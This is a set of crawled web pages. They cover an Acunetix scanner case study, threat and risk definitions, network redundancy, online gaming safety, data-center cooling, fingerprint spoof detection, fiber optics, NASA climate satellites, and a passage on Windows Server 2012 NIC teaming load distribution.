Acunetix uses technologies like AcuSenor and AcuMonitor to achieve better scanning results. Acunetix AcuSensor Technology is a security technology that allows the identification of more vulnerabilities with less false positives. In addition, it indicates the exact location of the code where the vulnerability is and reports debug information. This technology combines black box scanning techniques and feedback from sensors placed inside the source code to achieve more accuracy. The screenshots below show the SQL injection (Figure 11) and PHP vulnerabilities (Figure 12) identified by the AcuSensor technology. It displays the stack trace of SQL injection threat and the file name with line number for the PHP code injection, which helps the developers to trace and fix vulnerabilities easily. It can also help developers to understand more about vulnerabilities which in turn helps them to write more secure code.
Another technology used by Acunetix is AcuMonitor Technology. While testing web applications, normally the scanner sends a request to a target, receives a response, analyses that response, and raises an alert based on the analysis. Some vulnerabilities do not give a response to a scanner during testing (Out-of-band vulnerability testing), and therefore, are not detectable using the “request/response” testing model. Detecting these vulnerabilities requires an intermediary service that a scanner can access. Acunetix, combined with AcuMonitor, makes automatic detection of such vulnerabilities easy. AcuMonitor detects Out-of-band SQL Injection (OOB SQLi), Blind XSS (or Delayed XSS), SMTP Header Injection, Blind Server-side XML/SOAP Injection, Out-of-band Remote Code Execution (OOB RCE), Host Header Attack, Server-side Request Forgery (SSRF), and XML External Entity Injection (XXE) automatically (“AcuMonitor,” n.d.).
Acunetix allows multiple scans simultaneously, but this may require more time for completing the entire scanning process. Time to scan a particular website or web application depends upon the technologies and complexity of the target website. Acunetix also allows to scan for particular vulnerabilities like XSS that can be set while starting of the scan. This is an advantage as this is much quicker compared to full scan and may help the developers to concentrate on a particular vulnerability and fix it. Reports generation is another good feature which helps to reuse the scan results. Different reports allow to get results based on specific need. Even though Acunetix reduces the false positives, scanning results may still contain false positives. Developers need to double check the scanning result and confirm that results are not false positives, which can be more time consuming. If Acunetix provides a feature to mark the false positives manually and restrict those from further scanning results, scanning results could have been better with less false positives.
Web Vulnerability Scanners (WVS) insert garbage values in the database while scanning (Suteva, Anastasov, & Mileva, 2014). WVS does automated scanning and performs several operations on a database to identify SQL injection and other threats related to the database. This can be an issue in the production environment as many garbage values are inserted with the original data.
An automated vulnerability scanner sends thousands of web requests to the web server. In order to accelerate their scanning, vulnerability scanners tend to send these requests using multiple simultaneous connections. If a web server is incapable of handling all the requests, the web server may slow down, resulting in a denial of service (Darmanin, 2014). Automated WVS allows deep scanning. Thisi when a WVS tries to access all possible paths and links in website. This can be an issue while crawling into sensitive links. Crawling on sensitive links like delete can cause accidental deletion of some important data (Darmanin, 2014).
Some websites allow sending emails, for example, a “contact us” option in websites. While testing these websites, multiple emails can be sent to a particular address, as a mass mailing attack or mail flooding (Darmanin, 2014).
There are few solutions available for the problems discussed above. Testing in a staging environment, instead of production environment, can help prevent denial of service problems in the release environment (Darmanin, 2014). This also avoids insertion of garbage values in the production database. Denial of service in a production environment can be reduced. Using CAPTCHAs in the form for sending emails will help prevent email flooding. Furthermore, a WVS like Acunetix allows to restrict sensitive links from being crawled (Darmanin, 2014).
Smartphones and tablets continue to pose some risks to users in terms of web security. These devices typically handle different wireless connections, cached or saved passwords, and notes and emails containing private information. As these bits of data are stored on mobile devices, they may be exposed to being stolen through web browsers. The education sector comprises the largest and growing groups of users of mobile devices. School teachers, employees and students constantly rely on their websites and online learning tools, and these are frequently facing security threats (Levin, 2017). More than ever, the users of educational information systems need to be more alert and better trained in security matters. IT support services for schools need to build their protective capacity and carry out new security practices. Mobile and web security aspects also need to be covered by analysts and developers of educational applications by making security a crucial requirement and design principle (Erturk, 2013).
Web Vulnerability Scanners (WVS) help to speed up the website and web application vulnerability testing process. Acunetix is a popular automated vulnerability scanner, which not only identifies vulnerabilities, but also gives suggestions for solving these vulnerabilities. AcuSensor technology also focuses on reducing the reporting of false positives for websites based on PHP and .NET technologies. utilizing new behavioural analysis techniques in the future can make Acunetix even more accurate. Using of Acunetix or a similar WVS is very useful for many web developers since this type of tool makes the detection of threats easier for security novices. Using a trial version can be helpful in make the decision regarding how long a period to choose for the paid subscription in the future. Different plans help the users to choose a suitable subscription option according to their needs. Website and application developers can use WVS during their development and testing to ensure a very secure web application before it is released into the production environment. This case study is helpful for orienting students with the basics of a WVS, with Acunetix as an example. Whereas some security solutions are geared towards examining organisational websites, other solutions may focus on managing the organisation’s mobile devices. It is useful for both app designers and for IT support to scan mobile devices to identify the security vulnerabilities and to highlight insecure apps (Revankar, 2015). Further technical studies can be done to compare different vulnerability scanners, their effectiveness, and their peculiar strengths, which in turn would help developers choose an appropriate WVS for each web application.
Abdulqader, F. B., Thiyab, R. M., & Ali, A. M. (2017). The impact of SQL injection attacks on the security of databases. In Proceedings of the 6th International Conference on Computing and Informatics (pp. 323-331).
Acunetix – Website security – keep in check with Acunetix. (n.d.). Retrieved from https://www.acunetix.com
AcuMonitor: For detecting an XXE attack, Blind XSS and SSRF – Acunetix. (n.d.). Retrieved from https://www.acunetix.com/vulnerability-scanner/acumonitor-technology/
Cloud Security Alliance. (2016). The Treacherous 12: Cloud Computing Top Threats. Retrieved from https://downloads.Cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf
Darmanin, G. (2014, May 5). Negative impacts of automated vulnerability scanners and how to prevent them. Retrieved from https://www.acunetix.com/blog/articles/negative-impacts-automated-vulnerability-scanners-prevent/
Erturk, E. (2012). Two Trends in Mobile Malware: Financial Motives and Transitioning from Static to Dynamic Analysis. Infonomics Society.
Erturk, E. (2013). An intelligent and object-oriented blueprint for a mobile learning institute information system. International Journal for Infonomics (IJI), 6(3/4), 736-743.
Gupta, S., & Gupta, B. B. (2015). PHP-sensor. Proceedings of the 12th ACM International Conference on Computing Frontiers – CF ’15. doi:10.1145/2742854.2745719
InfoSec Institute. (2014, September 24). 14 best open source Web Application Vulnerability Scanners. Retrieved from http://resources.infosecinstitute.com/14-popular-web-application-vulnerability-scanners/#gref
Jasmine, M. S., Devi, K., & George, G. (2017). Detecting XSS based Web Application Vulnerabilities. International Journal of Computer Technology & Applications, 8(2), 291-297.
Jeeva, S., Raveena, K., Sangeetha, K., & Vinothini, P. (2016). Web Vulnerability Scanner using Software Fault Injection Techniques. International Journal of Advanced Research Trends in Engineering and Technology, 3(2), 637-649. Retrieved from https://www.researchgate.net/publication/303756552_WEB_VULNERABILITY_SCANNER_USING_SOFTWARE_FAULT_INJECTION_TECHNIQUES
Khalid, A., & Yousif, M. F. (2016). Dynamic analysis tool for detecting SQL injection. International Journal of Computer Science and Information Security, 14(2), 224-232. Retrieved from https://www.researchgate.net/publication/311081330_Dynamic_Analysis_Tool_for_Detecting_SQL_Injection
Levin, D. (2017, March 14). How Should We Address the Cybersecurity Threats Facing K-12 Schools? Retrieved from https://www.edtechstrategies.com/blog/how-should-we-address-cybersecurity-threats-facing-k-12-schools/
Lyne, J. (2013, September 6). 30,000 Web Sites hacked a day. How do you host yours? Retrieved from https://www.forbes.com/sites/jameslyne/2013/09/06/30000-web-sites-hacked-a-day-how-do-you-host-yours/#4d3626541738
OWASP [Open Web Application Security Project]. (2015, October 6). Path Traversal. Retrieved from https://www.owasp.org/index.php/Path_Traversal
Revankar, M. (2015, October 15). Mobile Device App Inventory Auditing with Nessus 6.5. Retrieved from https://www.tenable.com/blog/mobile-device-app-inventory-auditing-with-nessus-65
Saeed, F. A. (2014). Using WASSEC to evaluate commercial Web Application Security Scanners. International Journal of Soft Computing and Engineering, 4(1), 177-181. Retrieved from https://www.researchgate.net/profile/Fakhreldeen_Saeed2/publication/311310455_Using_WASSEC_to_Evaluate_Commercial_Web_Application_Security_Scanners/links/5879149c08ae9275d4d91b83/Using-WASSEC-to-Evaluate-Commercial-Web-Application-Security-Scanners.pdf
Schupak, A. (2015, March 24). One in three top websites at risk for hacking – CBS News. Retrieved from http://www.cbsnews.com/news/one-in-three-websites-at-risk-for-hacking/
Suteva, N., Anastasov, D., & Mileva, A. (2014, April). One unwanted feature of many Web Vulnerability Scanners. Paper presented at Proceedings of the 11th International Conference on Informatics and Information Technologies.
Warman, M. (2013, January 15). 90 per cent of passwords ‘Vulnerable to Hacking’- Business Insider. Retrieved from https://www.businessinsider.com.au/90-percent-of-passwords-vulnerable-to-hacking-2013-1?r=US&IR=T
"Acunetix is our vulnerability scanning tool of choice for situations where information security is a real concern and confidence in safety is key"JP Lessard President of Software Services
"Acunetix has played a very important role in the identification and mitigation of web application vulnerabilities. Acunetix has proven itself and is worth the cost. Thank you Acunetix team."M. Rodgers Member of the US Air Force IT Security Team
"Acunetix is used in a complementary way with other Web Scanners to achieve the best vulnerability detection coverage possible"Nicolas Pougetoux Manager of the Audit Department | <urn:uuid:791c0265-c607-4670-9ea6-c26591d62e14> | CC-MAIN-2022-40 | https://www.acunetix.com/case-studies/eastern-institute-of-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00087.warc.gz | en | 0.879741 | 4,628 | 2.59375 | 3 |
Vulnerability x Threat = Risk
In order to understand risk, we must first understand the definition of threat and vulnerability. A business risk results from significant conditions, events, circumstances, actions, or inactions that could adversely affect your company’s ability to achieve its objectives and execute strategies. Risk is a condition that results when vulnerabilities and threats act upon critical assets.
In information security, we like to use the formula “Vulnerability x Threat = Risk” to demonstrate this. So, what is threat and vulnerability?
What is Threat?
A threat is a potential event that could take advantage of your protected asset’s flaws and result in the loss of your security’s confidentiality, integrity, and/or availability (C-I-A). Threats result in non-desirable performance of critical assets. There’s always a potential flaw that could be exposed, and when a threat is identified, think about the way it could affect the pillars of security: integrity, availability, and confidentiality.
Think about this scenario: Your organization is storing a box of hard-copy, paper patient records. The sprinklers in your building go off, and the records are soaked. You have to hire a company to come in and dry out the records and restore them to a readable state. What security losses have you had? Availability, but also the loss of integrity because the data is lost. It hasn’t been stolen, so there’s no loss of confidentiality, but the data is not usable because of water damage. We can’t have the full pillars of security if we can’t use the asset for the purpose it was intended.
Next, let’s think about the three types of threats:
- What are the natural threats? This could be anything like floods, earthquakes, or hurricanes.
- What are man-made threats to the assets we’re trying to protect? Man-made threats are categorized as intentional, deliberate, or accidental.
- What about environmental threats? Could your asset be affected by environmental threat such as power failure, pollution, chemical damage, or water damage?
What is Vulnerability?
A vulnerability is a known or unknown flaw or weakness in an asset that could result in the loss of the asset’s integrity, availability, and/or confidentiality. An internal vulnerability could be a lack of security awareness training or no documentation for a critical process. Let’s go back to our paper records scenario. The flaws would be the fact that the print can fade over time, so it could be unusable in the future, or the fact that it has a finite location, so if it’s ever lost, that information is gone.
Threat identification and vulnerability identification are both part integral parts of a risk assessment. Once you’ve identified your threats and vulnerabilities, you’ll be able to determine how to mitigate the negative impact of potential threats and vulnerabilities. Controls that you put into place should be based on an assessment of risk. For more details on how to complete a formally documented risk assessment, download our free Risk Assessment Guide.
What is threat? A threat is a potential source to exercise, accidentally or intentionally, a specific vulnerability. What is a vulnerability? A vulnerability is a flaw or weakness in the system security procedures, design, implementation, or other controls that could be accidentally or intentionally exploited. | <urn:uuid:ba01f978-826b-4c8a-b285-f6c46f621670> | CC-MAIN-2022-40 | https://kirkpatrickprice.com/video/what-is-threat-and-vulnerability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00288.warc.gz | en | 0.936895 | 702 | 3.34375 | 3 |
Network redundancy is a duplicated infrastructure where additional or alternate instances of network devices and connections are installed to ensure an alternate path in case of a failure on the primary service. This is how you keep your business online and available should your main path of communication go down.
While redundancy is great, many times services are in the same data center, share the same fiber bundle, patch panel or equipment. In fact, hardware failures and fiber cuts are the leading causes of network outages today.
Being redundant may not protect you as well as planned.
Network Redundancy vs. Network Diversity
A duplicate or alternate instance of your network doesn’t always protect you from the leading causes of network outages, and it can’t always protect you from less frequent, but more catastrophic incidents, like floods or fires. Sometimes construction work, human error and even squirrels can interrupt your network service. To protect against these scenarios, network diversity is the answer.
Network diversity takes redundancy one step further, duplicating your infrastructure on a geographically diverse path, in another data center or even in the cloud.
Achieving Network Diversity Through Geographic Redundancy
Diversity is key. Being geographically diverse protects you from weather events, construction and other single location incidents. If your redundant site is in a different state, or even in another country, your chances of two impacting events at the same time are significantly lessened. For even greater resiliency, you can move your redundancy or disaster recovery to the cloud via a Disaster Recovery as a Service solution.
Achieving Network Diversity via Multihomed BGP
You can achieve network diversity by being in geographically diverse data centers with the use of multihomed BGP. INAP offers the use of several BGP communities to ensure immediate failover of routing to your data center environment in case of a failure. Additionally, through INAP’s propriety technology, Performance IP®, your outbound traffic is automatically put on the best-performing route.
Achieving Network Diversity Through Interconnection
Another consideration is the connection from the data center to your central office. One can assume just because you have two different last mile providers for your redundancy that they use different paths. This usually is not the case; many fiber vaults and manholes are shared. This can result in both your primary and back up service being impaired when a backhoe unearths an 800-strand fiber. Ask the provider to share the circuit path to ensure your services are on diverse paths. INAP works to avoid these issues by offering high capacity metro network rings in key markets. Metro Connect interconnects multiple data centers with diverse paths, allowing you to avoid single points of failure for your egress traffic.
Redundancy is key to maintain the demanding uptime of today’s business. In most cases this does the job, however if your model is 100 percent uptime, it may be beneficial to start investing in a diverse infrastructure, as well. | <urn:uuid:96dec7e9-96dd-4387-91d4-62d3a867c3f2> | CC-MAIN-2022-40 | https://www.inap.com/blog/network-redundancy-vs-network-diversity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00288.warc.gz | en | 0.918184 | 611 | 2.53125 | 3 |
Over the past several decades, online gaming has evolved into one of the most popular entertainment industries in the world. However, with many advancements and improvements also comes new dangers. Online gaming now often includes multiplayer options that involve unique safety concerns. Features like video chatting, file sharing, and personal data sharing can make players more susceptible to cyber threats, cyberbullying or even malware attacks. With these threats in mind, it’s important to know how to stay safe while online gaming.
Online gaming dangers
Online gaming involves specific dangers, even ones that might be unexpected. While some games might be safe for children from a content standpoint, multiplayer chats or webcam access can open them up to risk. From educational games to adventure games, online gaming dangers include:
- Privacy problems
- Webcam hacking
- Hidden fees or scams
- Age-inappropriate content
Cyberbullying can be a risk for any online gamers, especially young adults and children. The anonymity of players and the use of avatars can be a fun way to create alter-egos or fictional versions of themselves, but it also comes with risks. Online gamers can use this anonymity to harass, bully and harm other players. Cyberbullying can happen either by direct message or in public chat channels.
When gaming online, it’s important to protect your privacy. Storing or using personal information on consoles, computers and other devices can put private data at risk. Using real names in online usernames or profiles can allow hackers and cybercriminals to easily gain access to personal information.
Many gaming devices and online games now include integrated video and microphone access. From laptops to tablets to smartphones, any device with a webcam may be at risk of hacking. Hackers can remotely control both webcams and microphones and exploit players.
Hidden fees and scams
Online gaming often includes hidden fees or other in-game costs that can add up. Young adults and children without supervision might overlook subscription fees and add-ons. One of the biggest concerns with online gaming purchases is that unsecured payment information could be obtained by hackers.
How to stay safe on online gaming
Luckily, while online gaming presents challenges and dangers, there are many solutions to ensure you or your child stay safe. Being aware of the dangers of online gaming is the first step to creating a safe online gaming experience. There are also specific steps you can take to secure your private information and protect against cyberbullying.
Block or report bullies
If your children enjoy online gaming, you should be aware of ways to prevent or stop cyberbullying. Before letting your child participate in online gaming, make sure they know safe digital behavior. Clicking on links from strangers or participating in bullying of other players is unsafe and likely violates the game’s terms of service. Some games allow you to block all direct messaging from other users and most games will allow you to block and report individuals engaging in cyberbullying.
Protect personal information
Avoid sharing personal information when online gaming to prevent hacking. When creating usernames, gamers should choose something that doesn’t include their first or last name or other personal information like birth dates. Create strong and unique passwords to avoid the risk of being hacked.
To help mitigate the risk of hackers controlling your device’s microphone or webcam, you can often install cybersecurity software that will check for malware, depending on your gaming device of choice. Ensuring that all webcams are set to “off” as their default and using physical camera covers are more ways to protect yourself from hackers.
Before you donate or sell old devices, remember to always delete all personal information first and reset the device. Having names, addresses or payment information on these devices can put you at risk.
Do your research
Adults should always research games before letting their child play to ensure the content is age-appropriate. Different types of game ratings can let you know the intended age range for an online game. For example, games rated “E” are typically suitable for all ages. To ensure your child doesn’t view inappropriate material, you can play the game with your child or on your own first to explore all aspects of the game beforehand.
When choosing which games to let your child play, you can also check to see if they include multiplayer options. Online games that allow playing with strangers and have chat functions may be better to avoid for young children.
Following online gaming safety protocols can help prevent everything from cyberbullying to stolen personal and financial information. Using these tips will help make online gaming a safer and more enjoyable experience for you or your children. To learn more about online gaming, explore the CenturyLink Gaming Hub for tips on improving internet speed for gaming and more. | <urn:uuid:a008e284-edf6-425e-9f7d-19beba3ae2e9> | CC-MAIN-2022-40 | https://discover.centurylink.com/online-gaming-safety.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00288.warc.gz | en | 0.917459 | 988 | 2.6875 | 3 |
For most data centers, cooling used to be pretty straightforward: A CRAC unit kept the server room cold enough that staff often wear sweaters to work no matter the outside temperature. But, the nature of data centers has changed significantly in the last decade. More applications require high-density cooling because rack densities continue to increase. The thermal design power (TDP) of chips has risen almost 50%, using more power and generating more heat.
In 2016, global data centers spent $8 billion to cool their data centers, and, if not kept in check, that is expected to reach $20 billion by 2024. This is due to the sheer amount of data being used and in need of a place to be stored: 175 zettabytes by 2025. So what is the best way to cool the data centers that are storing this mission critical information?
The two most common air-cooling methods are CRACs and CRAHs. In these systems, air is used to cool the entire room or individual racks/rows. CRACs are similar to a home air conditioner — air flows across cooled refrigerant and then blown into the room. CRAHs use chilled water, which requires a chiller.
• Require a specific layout, including raised floors and spaced racks.
• Have a lot of moving parts, which use space and require maintenance, including compressors or chillers, air handlers, humidity controls, air filters, and backup generators.
• Require aisle containment, which takes up space that could be used for more equipment.
• Are prone to developing hot spots, which threaten sensitive IT equipment.
• Are not the most efficient heat removal method.
• Require access to significant power, making it a poor choice for data centers in remote locations or edge data centers.
• Expose IT equipment to airborne contaminants and to the adverse effects of the air itself, including corrosion and oxidation.
• Can damage IT equipment as a result of the vibrations of the server fans
The two most common liquid cooling methods are single-phase immersion and liquid to chip. Single-phase liquid immersion uses a dielectric fluid surrounding the servers, which transfers the heat by circulating through a cooling distribution unit that disperses the heat and returns the cooled liquid back into the compartment. Liquid-to-chip cooling, also called direct-to-chip or cold plate cooling, uses coolant on a cold plate inside the server and a chilled water loop to carry the heat outside.
Single-phase liquid immersion systems:
• Have just three moving parts: a coolant pump, water pump, and cooling tower/dry cooling fan.
• Can be completely enclosed or sealed within modular structures, since no airflow is required.
• Are very efficient at removing heat.
• Reduce data center power usage and cooling costs.
• Enable reallocation of power to critical IT load within the same power envelope.
• Enable easy maintenance for IT equipment — lift the lid, remove the server and set it on integrated service rails.
• Can cool up to 100 kW per rack (theoretically, up to 200 kW when used with a chilled water system).
• Increase mean time between failures (MTBF).
• Extend the life of hardware by keeping temperatures consistent and protecting it from outside air
Liquid Versus Air
While air cooling is tried and tested and has been around for decades, it is becoming a less desirable choice in today’s computing environment. Some air-cooled data centers are capable of cooling upwards of 30 to 35 kW per rack. But, in reality, air-cooled data centers become very inefficient above 15 kW per rack.
Single-phase liquid cooling works on the principle that liquid conducts heat better than air to remove heat from the servers to keep them operating efficiently and safely. It can support densities up to 200 kW per rack and is a low-maintenance solution for data centers | <urn:uuid:be6b9f6c-8005-4ecf-b649-6a121f99a2d5> | CC-MAIN-2022-40 | https://www.missioncriticalmagazine.com/articles/93683-a-look-at-liquid-immersion-cooling?utm_campaign=Newsletter%20&utm_medium=email&_hsenc=p2ANqtz-9Lg_e2oM6nJ08kne9XqddGp64O0X2vzA9QGyjJ5W-SlFz05AtDmw_gEt6Vqr2_AF0yMGngFbFFadJGYydBUE8hmj_JXUlbyR1bnwqrl3CxdvHmhbQ&utm_source=hs_email&utm_content=139808838&hsCtaTracking=beeee30a-d398-4c91-a605-01eccd06a4fb%7C7cd7aea3-9a3c-47d7-b244-b97dcb2d94c6 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00288.warc.gz | en | 0.918293 | 816 | 3.125 | 3 |
Clarkson prof tackles fake fingerprints with new software
Think you can spoof a fingerprint scanner? Clarkson University professor Stephanie Schuckers has developed unique software to improve liveness detection and detect fakes.
Concerned with the increase in fingerprint fakers, Schuckers, a professor of the Electrical and Computer Engineering Department at Clarkson University has taken the task of identifying fake fingerprints into her own hands, the Watertown Daily Times reported.
“The information about how to fake a device is pretty readily known. There have been cases where people have been caught” Schuckers said. “A scanner has no way of knowing if you’ve faked the device. We really don’t have a good sense of how often it’s happened.”
The technology she’s developed, called NexID, is currently in market. When fingerprints are captured using fingerprint scanners, an image is taken and stored in a database for use when matching later on. Fake fingerprints leave different patterns compared to that of a real fingerprint. Schuckers software can detect the difference.
“A lot of information about you is out there. Where biometrics comes in is maybe it makes things easier for us.”
While biometrics may not guarantee a more secure world, particularly considering the threat of database hacks and individual spoofing, there is still room for innovation and improvement. For Schuckers, it’s all about recognizing vulnerabilities.
“We need to recognize what those vulnerabilities are and make a decision about what level of security we desire,” she said. | <urn:uuid:6b4f82dd-10de-4206-b8a4-8199e746f955> | CC-MAIN-2022-40 | https://www.biometricupdate.com/201209/clarkson-prof-tackles-fake-fingerprints-with-new-software | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00288.warc.gz | en | 0.932494 | 328 | 2.53125 | 3 |
Thanks to many new advancements in fiber optics, researchers are looking into the potential of being able to double the capacity of fiber-optic circuits. This would allow us to run fiber over longer distances that carries more data and still manages to cost less. Data transfer and fiber optics, much like storage space or processing power, has increased exponentially in recent years and seems to show no signs of slowing down. How have fiber optics been advancing and what can we expect to see in the near future?
How Does it Work?
To understand the advancements in fiber optic infrastructure, it’s important that we first understand what might limit fiber-optic circuits first. Fiber optic cables work by transmitting beams of light that are packed inside of fiber-optic glass wires. This light needs to be amplified and recreated at regular intervals, being transmitted over thousands of miles and converted from light to electricity. The conversion process in particular is a huge limiter on how much data we’re able to transmit over fiber.
Making Data Easier (and faster)
In response to this hurdle, researchers have looked into finding ways of making the data transmitted via laser beams easier to decipher. To do this, they’ve created “guardrails” for the light beams using a device called a frequency comb, which is able to encode the information before it is transmitted. In turn, this allows for data to be accurately transmitted over longer distances without those difficult conversion needs that can be costly and inefficient.
Why Does it Matter?
This is one step towards an “all-optical” network, which would be less expensive than traditional fiber networks and would carry far more data. While optical networks have been around since the 1980s, it wasn’t until the growth of the internet–and the need for faster data transfer speeds–that we began to see fiber networks being utilized more often. That said, there’s a lot of improvement ahead of us that will likely see even more advancements in fiber optics and far more fiber being installed worldwide.
Get in Touch with FiberPlus
FiberPlus has been providing fiber optic structured cabling and data communication solutions for over 25 years in the Mid Atlantic Region and for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (inside and outside plant)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Distributed Antenna Systems
- Public Safety DAS
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at firstname.lastname@example.org, or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999. | <urn:uuid:ce1b5cfa-b014-4506-b4f6-24d4138daaaf> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/helpful-information/advances-fiber-optic-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00288.warc.gz | en | 0.944642 | 674 | 3.3125 | 3 |
Cutting the programs could be a logistical nightmare.
Within weeks of the U.S. election, President Donald Trump said he intended to scrap NASA’s research on climate change, shifting those resources—less than $2 billion of the agency’s $19 billion budget—to its space program.
Other Republicans have echoed that goal. Oklahoma state Sen. Jim Bridenstine, who is reportedly being considered (among others) to run NASA, once called on Barack Obama to apologize to the people of Oklahoma for funding climate change research. Texas Rep. Lamar Smith, chairman of the House committee on Science, Space and Technology, said earlier this month NASA should be focused on space, not climate change, because “another dozen agencies” are already studying the latter.
But cutting NASA’s climate science research could prove to be an expensive, logistical nightmare, according to a contractor who works as an engineer for one NASA satellite that collects climate data. The engineer requested to remain anonymous to avoid jeopardizing their employment at the agency.
NASA currently has 16 Earth science satellites in orbit (and three other Earth science instruments attached to the International Space Station) that, in addition to climate data, collect information on the atmosphere, oceans and land-based phenomena like wildfires. The satellites make up the core of NASA’s climate science program, and the most immediate problem with eliminating climate research is what would become of them.
“If you stopped operations—if nobody manned the satellites—they would crash and spread space debris,” the engineer said. NASA currently tracks around 500,000 pieces of space debris traveling at extremely high speeds; satellite engineers must steer their spacecraft to avoid them.
If a satellite crashes into a piece of debris, the satellite would splinter, possibly sending “40,000 or 50,0000 pieces of space debris into low Earth orbit,” the engineer said. “Then you have to try to account for all those pieces of debris. That would be truly a crisis. They wouldn’t de-staff our teams just because of that danger.”
Transferring satellite operations to a different agency would be costly. NASA’s Earth science satellites are operated in large part by contractors, many with five-year agreements, who use specialized equipment at NASA’s Goddard Space Flight Center in Maryland. Severing those agreements, and physically moving those machines to a different agency’s headquarters, would be a massive headache.
“All the engineers and scientists are geographically living near the center where we work,” the engineer said. “All the resources—all that stuff is geographically tied down.”
Even if the Trump administration wanted to remove those satellites from space entirely, the logistics and red tape surrounding the “deorbiting process”—delicately bringing a satellite back to Earth—can take “years and years,” said the engineer, who worries more about the administration leaving the satellites in place and simply ceasing data collection.
Budgetary waste is a common refrain among those seeking to end climate science at NASA. Because other U.S. agencies like the Environmental Protection Agency and the National Oceanographic and Atmospheric Administration also study climate change and Earth science, critics argue, there is a degree of redundancy in NASA’s work.
But redundancy isn’t wasteful; it is a basic tenet of high-quality science. If more than one set of data point to the same trend or conclusion (especially if they were collected by entirely separate scientists at separate agencies), scientists can have more confidence the conclusion is correct.
For that very reason, climate scientists often use climate data gathered by NASA, NOAA and EPA. Eliminating any of these data sources would reduce the overall diversity of data and, by default, the scientific rigor of U.S. research. It would also consolidate data collection into the hands of fewer political appointees.
Already, grassroots efforts are underway at universities around the country to download and store federal science data. “Data rescue” groups have managed to harvest NASA’s Earth science data, as well as much of NOAA’s and EPA’s data. NASA employees have taken notice.
“We’re all pretty excited by it,” the engineer said. The data rescue initiatives have gained urgency in the wake of Scott Pruitt’s confirmation as EPA administrator, as NASA employees worry he could pull EPA’s climate data from public view.
“Censorship is my No. 1 concern,” the NASA engineer said. “Once you consolidate the sources of data, it’s easier to censor.” | <urn:uuid:f3875e20-f4a1-40cf-9193-4d73a2d40f85> | CC-MAIN-2022-40 | https://www.nextgov.com/cxo-briefing/2017/02/nasa-engineer-explains-why-trumps-plan-cut-space-agencys-climate-science-program-harder-it-sounds/135764/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00288.warc.gz | en | 0.944736 | 964 | 2.875 | 3 |
With a team formed you have the failover part of LBFO figured out. But what about the load balancing piece of LBFO? That’s what this post is going to discuss.
First, think about some concepts:
- A packet sent into the NIC team should not be fragmented and sent across multiple NICs. We like BIG packets because they fill bandwidth and reduce the time to get data from A to B.
- Sometimes we need to make the path of traffic predictable … very predictable. And sometimes we don’t … but there still needs to be some organisation.
There are 2 traffic or load distribution algorithms in WS2012 NIC teaming (actually it’s more if you dig into it). The one you choose when creating/configuring a team depends on the traffic and the purpose of the team.
Hyper-V Switch Port
Generally speaking, this is the load distribution that you should use when creating a NIC team that will be used to connect a Hyper-V external virtual switch to the LAN, as below.
However, you do not have to choose this type of load distribution for this architecture, but it is my rule of thumb. Let’s get into specifics.
Hyper-V Switch Port will route traffic from a virtual NIC (either in a VM or in the management OS) to a single physical NIC in the team (a team member). Let’s illustrate that. In the below diagram, the NIC team is associating the traffic from the vNIC in VM01 with the team member called pNIC1. The traffic from the vNIC in VM02 is being sent to pNIC2. Two things to note:
- The traffic path is predictable (unless a team member fails). Incoming traffic to the virtual NICs is also going to flow through their associated physical NICs
- This is not a per-VM association. It is a per-virtual NIC association. If we add a second virtual NIC to VM01 then the traffic for that virtual NIC could be associated with any team member by the NIC team.
This is one of the things that can confuse people. They see a team of 2 NICs, maybe giving them a “2 Gbps” or “20 Gbps” pipe. True, there is a total aggregation of bandwidth, but access to that bandwidth is given on per-team member basis. That means the virtual NIC in VM02 cannot exceed 1 Gbps or 10 Gbps, depending on the speeds of the team members (physical NICs in the team).
Hyper-V Switch Port is appropriate if the team is being used for an external virtual switch (like the above examples) and:
- You have more virtual NICs than you have physical NICs. Maybe you have 2 physical NICs and 20 virtual machines. Maybe you have 2 physical NICs and you are creating a converged fabric design with 4 virtual NICs in the management OS and several virtual machines.
- You plan on using the Dynamic Virtual Machine Queue (DVMQ) hardware offload then you should use Hyper-V Switch Port traffic distribution. DVMQ uses an RSS queue device in a team member to accelerate inbound traffic to a virtual NIC. The RSS queue must be associated with the virtual NIC and that means the path of inbound traffic must come through the same team member every time… and Hyper-V Switch Port happens to do this via the association process.
As I said, there are times, when you might not use Hyper-V Switch Port. Maybe you have some massive host, and you’re going to have just 2 massive VMs on it. You could use one of the alternative load distribution algorithms then. But that’s a very rare scenario. I like to keep it simple for people: use Hyper-V Switch Port if you are creating the NIC team for a Hyper-V external virtual switch … unless you understand what’s going on under the hood and have one of those rare situations to vary.
This method of traffic distribution in the NIC team does not associate virtual NICs with team members. Instead, each packet that is sent down to the NIC team by the host/server is inspected. The destination details of the packet (which can include MAC address, IP address, and port numbers) are inspected by the team to determine which team member to send the packet to.
